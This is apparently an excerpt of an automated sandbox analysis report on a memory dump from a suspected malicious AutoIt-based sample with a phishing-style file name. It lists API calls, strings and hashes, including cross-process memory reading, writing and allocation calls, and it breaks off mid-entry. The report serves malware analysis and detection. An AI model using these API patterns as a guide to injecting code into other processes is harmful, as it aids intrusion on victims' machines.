_memset.LIBCMT ref: 00BC63A8
_memmove.LIBCMT ref: 00BC6446
_memset.LIBCMT ref: 00BC646A

Strings

ERCP, xrefs: 00BC6313

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 9f15f735b64b0b16fd5c133e6605ac7e54ceeedc66f3994057872da77b8a881e
Instruction ID: 82a12fa1c55cae65628e1869334cc985ad69001bbfdbb89966f73edf4378a72e
Opcode Fuzzy Hash: 9f15f735b64b0b16fd5c133e6605ac7e54ceeedc66f3994057872da77b8a881e
Instruction Fuzzy Hash: 45519471900709DBDB28CF55C881FAABBF8EF44714F2485AEE95AC7341E7719A85CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00C09CD7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C119CC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C09778,?,?,00000034,00000800,?,00000034), ref: 00C119F6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C09D21

Part of subcall function 00C11997: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C097A7,?,?,00000800,?,00001073,00000000,?,?), ref: 00C119C1

Part of subcall function 00C118EE: GetWindowThreadProcessId.USER32(?,?), ref: 00C11919
Part of subcall function 00C118EE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C0973C,00000034,?,?,00001004,00000000,00000000), ref: 00C11929
Part of subcall function 00C118EE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C0973C,00000034,?,?,00001004,00000000,00000000), ref: 00C1193F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C09D8E
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C09DDB

Strings

@, xrefs: 00C09DF3

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 567ab317ba4057808472c0ca27bb4e768d9c984cfa12e42d3605fce39df1b2b6
Instruction ID: 8743c4ce604a80d5c96a53792c561b1d17d191a3ab13c2e2869c354ddf10f304
Opcode Fuzzy Hash: 567ab317ba4057808472c0ca27bb4e768d9c984cfa12e42d3605fce39df1b2b6
Instruction Fuzzy Hash: AE414F7690121CAFDB10DBA4CD41FEEBBB8EB0A700F044099FA55B7191DA706E85DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00C37BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00C3F910,00000000,?,?,?,?), ref: 00C37C4E
GetWindowLongW.USER32 ref: 00C37C6B
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C37C7B

Strings

SysTreeView32, xrefs: 00C37C20

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 47d7ea52554939ff48bbf4a1af81ecabf994c444de56ce1d51aabccf4602ed72
Instruction ID: e2ac38e03a1acdc53641699a172ad8c55aa425339c3cd9e2ebcc4a3bda62253f
Opcode Fuzzy Hash: 47d7ea52554939ff48bbf4a1af81ecabf994c444de56ce1d51aabccf4602ed72
Instruction Fuzzy Hash: 3131BE71624606AFDB218F38DC41BEA77A9EB09324F204729F879932E0D731ED519B50

Uniqueness

Uniqueness Score: -1.00%

Function 00C37648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00C376D0
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00C376E4
SendMessageW.USER32(?,00001002,00000000,?), ref: 00C37708

Strings

SysMonthCal32, xrefs: 00C3769B

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: e4a80c829ded79c8538d06b4ef8a734d6ff738fa54358a72755b59c66ed9b10b
Instruction ID: b7072a1dabd12eeb61a8a62a986fd3a2b060a8ecbd64e867785cde554fc83456
Opcode Fuzzy Hash: e4a80c829ded79c8538d06b4ef8a734d6ff738fa54358a72755b59c66ed9b10b
Instruction Fuzzy Hash: 4021BF72510219ABDF218E64CC82FEA3B79EB48714F110254FE256B1D0DAB1A8919BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C36F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C36FAA
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C36FBA
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C36FDF

Strings

Listbox, xrefs: 00C36F77

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 44b83d8e136d1e8fd14b0aca13791e59dbc9670ba08d9ccaabbcb68835edc3e3
Instruction ID: b54ef4be056ff5b4829ea3076ef8f24cbd9ad382b0b599e035d81146bfd69d65
Opcode Fuzzy Hash: 44b83d8e136d1e8fd14b0aca13791e59dbc9670ba08d9ccaabbcb68835edc3e3
Instruction Fuzzy Hash: F7219232620118BFDF119F94DC85FAF3BBAEF8D754F118128FA149B190CA71AC518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C3797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00C379E1
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00C379F6
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00C37A03

Strings

msctls_trackbar32, xrefs: 00C379B8

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: df64b85e1b0ea441d4907fe5b4c4842aa11f4cdfa27cf03669e6a27e35ae712c
Instruction ID: 82abe850116489413d14a83f713833d16773293069b6b641bf8383c881793cd6
Opcode Fuzzy Hash: df64b85e1b0ea441d4907fe5b4c4842aa11f4cdfa27cf03669e6a27e35ae712c
Instruction Fuzzy Hash: 4F110672254208BBEF249F74CC05FEB37A9EF89764F01062DFA55A60D0D271D851DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BB4C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00BB4C2E), ref: 00BB4CA3
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00BB4CB5

Strings

GetNativeSystemInfo, xrefs: 00BB4CAF
kernel32.dll, xrefs: 00BB4C9E

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 30b75ec8293b65b80cc210f8ed7fd896dd7a61039e569d7a5c98e24d49d7a3f7
Instruction ID: 332ce2f97878db3fe7f9afbc5e3f315960e0f337e7c81c8e65171581db36981b
Opcode Fuzzy Hash: 30b75ec8293b65b80cc210f8ed7fd896dd7a61039e569d7a5c98e24d49d7a3f7
Instruction Fuzzy Hash: B7D08C70920327DFC7204B30D90874AB6D4EF01B40B108C3DD881C2160D7B0C480CA50

Uniqueness

Uniqueness Score: -1.00%

Function 00BB4D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00BB4CE1,?), ref: 00BB4DA2
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BB4DB4

Strings

Wow64RevertWow64FsRedirection, xrefs: 00BB4DAE
kernel32.dll, xrefs: 00BB4D9D

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 569d1e5985b31852c18dc3fc39561427ed5f3e5b91b6d2e4a37c4ba1da6bdaca
Instruction ID: 8ec7837dd38c22dbe99b0aa67f363b3ee6bd75a38719bbd20f91ad386ad06c2d
Opcode Fuzzy Hash: 569d1e5985b31852c18dc3fc39561427ed5f3e5b91b6d2e4a37c4ba1da6bdaca
Instruction Fuzzy Hash: D4D01771964713CFDB209F31E848B9EB6E4EF05359B118C7ED8D6D6160E7B0D880CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BB4D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00BB4D2E,?,00BB4F4F,?,00C762F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BB4D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BB4D81

Strings

Wow64DisableWow64FsRedirection, xrefs: 00BB4D7B
kernel32.dll, xrefs: 00BB4D6A

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 9962db3f5308403a1279f6c8ac2763e7f461176f71a1fcfac8e1bbba432ab590
Instruction ID: 2e4bbb0bd593df066656dba51836d210b3b509713846ac3507ba324bdea587e9
Opcode Fuzzy Hash: 9962db3f5308403a1279f6c8ac2763e7f461176f71a1fcfac8e1bbba432ab590
Instruction Fuzzy Hash: 78D01771920713CFDB209F35E84876AB6E8BF15356B118E7E9486D6260E7B0D880CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C31072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00C312C1), ref: 00C31080
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C31092

Strings

advapi32.dll, xrefs: 00C3107B
RegDeleteKeyExW, xrefs: 00C3108C

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 478464da704c2df349a600aed5fb0d43ccce7d475a9d197f324790a54efea750
Instruction ID: 45fd379e6e1c32e974deb02ed5e48b4a4edb721c9304fe5ffa49c3fbf270a0aa
Opcode Fuzzy Hash: 478464da704c2df349a600aed5fb0d43ccce7d475a9d197f324790a54efea750
Instruction Fuzzy Hash: D4D0E231920712CFD7349B35E868A1A76E4AF05361B158C3EA89ADA160E770C8C08A50

Uniqueness

Uniqueness Score: -1.00%

Function 00C293F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00C29009,?,00C3F910), ref: 00C29403
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00C29415

Strings

GetModuleHandleExW, xrefs: 00C2940F
kernel32.dll, xrefs: 00C293FE

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 94f5f3f0fd81aa383d90ad5eaa6871103b05c0632604e8730aa956d8e5ca6d1d
Instruction ID: 9a8990d2280e7d4ae0f687ba8592a4f903242150abd297cb57dc4762f0cfc4dd
Opcode Fuzzy Hash: 94f5f3f0fd81aa383d90ad5eaa6871103b05c0632604e8730aa956d8e5ca6d1d
Instruction Fuzzy Hash: FCD01775920723DFDB20AF35E948B0BB6E5AF05351F11CC3EA496D6960E6B0C881DA90

Uniqueness

Uniqueness Score: -1.00%

Function 00BF1B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00BF1B42
__swprintf.LIBCMT ref: 00BF1B73

Strings

WIN_XPe, xrefs: 00BF1BB2
%.3d, xrefs: 00BF1B4D

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 88188aa8569dfcccbd0fe150ba61b2e4d40a892ba6871fa3e1f1d73e52b42bd3
Instruction ID: 07284234e8c3c6d986f81af2bb04df4ec7f1f10a26e939896caac18b96ce1350
Opcode Fuzzy Hash: 88188aa8569dfcccbd0fe150ba61b2e4d40a892ba6871fa3e1f1d73e52b42bd3
Instruction Fuzzy Hash: CAD01271C0411CEACB14DA949DC49FAB7FCA704301F540DD2BA06A3001F2759B89AB21

Uniqueness

Uniqueness Score: -1.00%

Function 00C076C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe58db5b39cf97dd272949989809023ae82c9eacd304f158424a9af23e076ee7
Instruction ID: 01c842da6edbb6fe80505c01dbe172472cf2e7360e60777e5a1d046200f56f84
Opcode Fuzzy Hash: fe58db5b39cf97dd272949989809023ae82c9eacd304f158424a9af23e076ee7
Instruction Fuzzy Hash: D7C16274E04216EFCB18CF94C888E6EB7B5FF48714B118698E815EB291D730EE81DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C2E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00C2E3D2
CharLowerBuffW.USER32(?,?), ref: 00C2E415

Part of subcall function 00C2DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C2DAD9

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00C2E615
_memmove.LIBCMT ref: 00C2E628

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 0e44a78f76d2c328d051b4ca8c3b2f4f295a569914532574b8c3d24b09a32b10
Instruction ID: 6664977874dd08296c8edd59961913fa2cfa79143a22fd3d36a07498c9a8a57f
Opcode Fuzzy Hash: 0e44a78f76d2c328d051b4ca8c3b2f4f295a569914532574b8c3d24b09a32b10
Instruction Fuzzy Hash: E9C17D716083119FC714EF28C480A6ABBE4FF89314F14896EF899AB751D770EA05CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00C283A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00C283D8
CoUninitialize.OLE32 ref: 00C283E3

Part of subcall function 00C0DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C0DAC5

VariantInit.OLEAUT32(?), ref: 00C283EE
VariantClear.OLEAUT32(?), ref: 00C286BF

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: bb616294f0e263b690fa2b661e0da14c7d9ccf766d8e5053098873756bcb042d
Instruction ID: 4191cb527ffdc00ab553782548ad6e7cb0e8d980d9836230d221b6f6333e3903
Opcode Fuzzy Hash: bb616294f0e263b690fa2b661e0da14c7d9ccf766d8e5053098873756bcb042d
Instruction Fuzzy Hash: A3A159752047119FDB10DF15C885B6AB7E4BF89314F04849CFA9AAB7A2CB70ED04CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C07A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00C42C7C,?), ref: 00C07C32
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00C42C7C,?), ref: 00C07C4A
CLSIDFromProgID.OLE32(?,?,00000000,00C3FB80,000000FF,?,00000000,00000800,00000000,?,00C42C7C,?), ref: 00C07C6F
_memcmp.LIBCMT ref: 00C07C90

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 35803e169217014583f6aaef7528a03277afb81c9cd6706c9d1ac68c327e0904
Instruction ID: 39b7dd8b66d95e1a29614f86f79fc0b6c4f5889dabf9d11a5a6b7dff618db2ef
Opcode Fuzzy Hash: 35803e169217014583f6aaef7528a03277afb81c9cd6706c9d1ac68c327e0904
Instruction Fuzzy Hash: 14810B75E00109EFCB04DF94C984EEEB7B9FF89315F204598E516AB290DB71AE46CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C06DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C06E04
SysAllocString.OLEAUT32(00000000), ref: 00C06EAD
VariantCopy.OLEAUT32 ref: 00C06EDC
VariantClear.OLEAUT32(?), ref: 00C06F03

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
